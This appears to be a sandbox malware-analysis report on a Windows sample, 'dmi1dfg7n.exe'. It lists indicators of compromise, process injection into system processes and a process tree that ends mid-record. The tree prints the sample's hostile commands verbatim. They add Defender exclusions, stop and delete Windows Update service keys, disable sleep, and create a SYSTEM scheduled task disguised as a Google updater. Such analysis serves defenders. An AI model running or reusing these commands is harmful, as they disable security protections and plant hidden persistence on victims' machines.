Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010005573657273003c0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000055007300650072007300000014000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0	Explorer.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

3212 Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEsvchost.exepowershell.exe

pid	process
408	powershell.exe
408	powershell.exe
3624	powershell.exe
3624	powershell.exe
3084	powershell.exe
3084	powershell.exe
1688	powershell.EXE
1688	powershell.EXE
1688	powershell.EXE
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
2824	powershell.EXE
2824	powershell.EXE
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3264	svchost.exe
3264	svchost.exe
3264	svchost.exe
3264	svchost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
4448	powershell.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
4448	powershell.exe
4448	powershell.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe
4448	powershell.exe
3720	dllhost.exe
3720	dllhost.exe
3720	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3212 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

672

pid	process
672

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	408	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeShutdownPrivilege	4020	powercfg.exe
Token: SeCreatePagefilePrivilege	4020	powercfg.exe
Token: SeShutdownPrivilege	4120	powercfg.exe
Token: SeCreatePagefilePrivilege	4120	powercfg.exe
Token: SeShutdownPrivilege	1660	powercfg.exe
Token: SeCreatePagefilePrivilege	1660	powercfg.exe
Token: SeShutdownPrivilege	4124	powercfg.exe
Token: SeCreatePagefilePrivilege	4124	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3624	powershell.exe
Token: SeSecurityPrivilege	3624	powershell.exe
Token: SeTakeOwnershipPrivilege	3624	powershell.exe
Token: SeLoadDriverPrivilege	3624	powershell.exe
Token: SeSystemProfilePrivilege	3624	powershell.exe
Token: SeSystemtimePrivilege	3624	powershell.exe
Token: SeProfSingleProcessPrivilege	3624	powershell.exe
Token: SeIncBasePriorityPrivilege	3624	powershell.exe
Token: SeCreatePagefilePrivilege	3624	powershell.exe
Token: SeBackupPrivilege	3624	powershell.exe
Token: SeRestorePrivilege	3624	powershell.exe
Token: SeShutdownPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeSystemEnvironmentPrivilege	3624	powershell.exe
Token: SeRemoteShutdownPrivilege	3624	powershell.exe
Token: SeUndockPrivilege	3624	powershell.exe
Token: SeManageVolumePrivilege	3624	powershell.exe
Token: 33	3624	powershell.exe
Token: 34	3624	powershell.exe
Token: 35	3624	powershell.exe
Token: 36	3624	powershell.exe
Token: SeIncreaseQuotaPrivilege	3624	powershell.exe
Token: SeSecurityPrivilege	3624	powershell.exe
Token: SeTakeOwnershipPrivilege	3624	powershell.exe
Token: SeLoadDriverPrivilege	3624	powershell.exe
Token: SeSystemProfilePrivilege	3624	powershell.exe
Token: SeSystemtimePrivilege	3624	powershell.exe
Token: SeProfSingleProcessPrivilege	3624	powershell.exe
Token: SeIncBasePriorityPrivilege	3624	powershell.exe
Token: SeCreatePagefilePrivilege	3624	powershell.exe
Token: SeBackupPrivilege	3624	powershell.exe
Token: SeRestorePrivilege	3624	powershell.exe
Token: SeShutdownPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeSystemEnvironmentPrivilege	3624	powershell.exe
Token: SeRemoteShutdownPrivilege	3624	powershell.exe
Token: SeUndockPrivilege	3624	powershell.exe
Token: SeManageVolumePrivilege	3624	powershell.exe
Token: 33	3624	powershell.exe
Token: 34	3624	powershell.exe
Token: 35	3624	powershell.exe
Token: 36	3624	powershell.exe
Token: SeIncreaseQuotaPrivilege	3624	powershell.exe
Token: SeSecurityPrivilege	3624	powershell.exe
Token: SeTakeOwnershipPrivilege	3624	powershell.exe
Token: SeLoadDriverPrivilege	3624	powershell.exe
Token: SeSystemProfilePrivilege	3624	powershell.exe
Token: SeSystemtimePrivilege	3624	powershell.exe
Token: SeProfSingleProcessPrivilege	3624	powershell.exe
Token: SeIncBasePriorityPrivilege	3624	powershell.exe
Token: SeCreatePagefilePrivilege	3624	powershell.exe
Token: SeBackupPrivilege	3624	powershell.exe
Token: SeRestorePrivilege	3624	powershell.exe
Token: SeShutdownPrivilege	3624	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

Explorer.EXE

pid process

3212 Explorer.EXE
3212 Explorer.EXE
3212 Explorer.EXE
3212 Explorer.EXE
3212 Explorer.EXE
3212 Explorer.EXE

Suspicious use of SendNotifyMessage 36 IoCs

Processes:

Explorer.EXE

pid	process
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE

Suspicious use of SetWindowsHookEx 27 IoCs

Processes:

Explorer.EXEdmi1dfg7n.exeConhost.exeConhost.exeConhost.exe

pid	process
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
4408	dmi1dfg7n.exe
4676	Conhost.exe
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
3212	Explorer.EXE
4448	Conhost.exe
1864	Conhost.exe
3212	Explorer.EXE
3212	Explorer.EXE

Suspicious use of UnmapMainImage 3 IoCs

Processes:

RuntimeBroker.exeRuntimeBroker.exeExplorer.EXE

pid process

3704 RuntimeBroker.exe
5100 RuntimeBroker.exe
3212 Explorer.EXE

pid	process
3704	RuntimeBroker.exe
5100	RuntimeBroker.exe
3212	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dmi1dfg7n.execmd.execmd.exepowershell.exepowershell.EXEdllhost.exelsass.exeupdater.exe

description	pid	process	target process
PID 4980 wrote to memory of 408	4980	dmi1dfg7n.exe	powershell.exe
PID 4980 wrote to memory of 408	4980	dmi1dfg7n.exe	powershell.exe
PID 4980 wrote to memory of 4944	4980	dmi1dfg7n.exe	cmd.exe
PID 4980 wrote to memory of 4944	4980	dmi1dfg7n.exe	cmd.exe
PID 4980 wrote to memory of 384	4980	dmi1dfg7n.exe	cmd.exe
PID 4980 wrote to memory of 384	4980	dmi1dfg7n.exe	cmd.exe
PID 4980 wrote to memory of 3624	4980	dmi1dfg7n.exe	powershell.exe
PID 4980 wrote to memory of 3624	4980	dmi1dfg7n.exe	powershell.exe
PID 4944 wrote to memory of 1504	4944	cmd.exe	sc.exe
PID 4944 wrote to memory of 1504	4944	cmd.exe	sc.exe
PID 384 wrote to memory of 4020	384	cmd.exe	powercfg.exe
PID 384 wrote to memory of 4020	384	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 3696	4944	cmd.exe	sc.exe
PID 4944 wrote to memory of 3696	4944	cmd.exe	sc.exe
PID 4944 wrote to memory of 3016	4944	cmd.exe	sc.exe
PID 4944 wrote to memory of 3016	4944	cmd.exe	sc.exe
PID 384 wrote to memory of 4120	384	cmd.exe	powercfg.exe
PID 384 wrote to memory of 4120	384	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 2624	4944	cmd.exe	sc.exe
PID 4944 wrote to memory of 2624	4944	cmd.exe	sc.exe
PID 384 wrote to memory of 1660	384	cmd.exe	powercfg.exe
PID 384 wrote to memory of 1660	384	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 2560	4944	cmd.exe	sc.exe
PID 4944 wrote to memory of 2560	4944	cmd.exe	sc.exe
PID 384 wrote to memory of 4124	384	cmd.exe	powercfg.exe
PID 384 wrote to memory of 4124	384	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 396	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 396	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 1368	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 1368	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 2808	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 2808	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 4348	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 4348	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 4764	4944	cmd.exe	reg.exe
PID 4944 wrote to memory of 4764	4944	cmd.exe	reg.exe
PID 4980 wrote to memory of 2892	4980	dmi1dfg7n.exe	dialer.exe
PID 4980 wrote to memory of 2892	4980	dmi1dfg7n.exe	dialer.exe
PID 4980 wrote to memory of 2892	4980	dmi1dfg7n.exe	dialer.exe
PID 4980 wrote to memory of 3084	4980	dmi1dfg7n.exe	powershell.exe
PID 4980 wrote to memory of 3084	4980	dmi1dfg7n.exe	powershell.exe
PID 3084 wrote to memory of 2620	3084	powershell.exe	schtasks.exe
PID 3084 wrote to memory of 2620	3084	powershell.exe	schtasks.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 1688 wrote to memory of 3720	1688	powershell.EXE	dllhost.exe
PID 3720 wrote to memory of 624	3720	dllhost.exe	winlogon.exe
PID 3720 wrote to memory of 692	3720	dllhost.exe	lsass.exe
PID 3720 wrote to memory of 968	3720	dllhost.exe	svchost.exe
PID 3720 wrote to memory of 60	3720	dllhost.exe	dwm.exe
PID 692 wrote to memory of 2176	692	lsass.exe	sysmon.exe
PID 852 wrote to memory of 4448	852	updater.exe	powershell.exe
PID 852 wrote to memory of 4448	852	updater.exe	powershell.exe
PID 3720 wrote to memory of 452	3720	dllhost.exe	svchost.exe
PID 692 wrote to memory of 2176	692	lsass.exe	sysmon.exe
PID 3720 wrote to memory of 716	3720	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:692

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:60

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f5c002a6-b068-4104-8131-fedd7f47f8ee}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f49f8606-5d2a-4cce-950f-c5747e47e15c}
2⤵
PID:3084

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{96bbd1b9-7297-4d8a-9e47-1944eeb835a8}
2⤵
PID:3736

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{4ee13b5f-6667-46bf-8b2c-2b3bccf92d7d}
2⤵
PID:1524

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{abfb3ee6-7747-4b30-97ae-75f6692e32ab}
2⤵
PID:1428

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{552184cf-ce11-458a-a567-f75c73949ff8}
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2220

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:2864

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2956

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:792

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2132

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3212

C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3048

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1504

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:3696

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3016

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:2624

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:2560

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:396

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:1368

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
- Modifies security service
PID:2808

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:4348

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:4764

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:384

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2288

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
3⤵
- Drops file in Windows directory
PID:2892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
4⤵
PID:2620

C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:2388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
PID:4648

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2152

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4804

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:980

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:892

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
- Checks processor information in registry
- Enumerates system info in registry
PID:560

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3872

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:2496

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:2964

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
- Enumerates system info in registry
PID:3264

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:2976

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:4788

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1556

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:1452

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Checks computer location settings
- Checks system information in the registry
- Enumerates system info in registry
PID:4792

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:3924

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:1672

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:3768

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
PID:4264

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4428

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
3⤵
- Drops file in Windows directory
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
3⤵
PID:5076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Checks processor information in registry
PID:3812

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
4⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
PID:2284

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:3348

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1996

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:1068

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:2140

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:3048

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
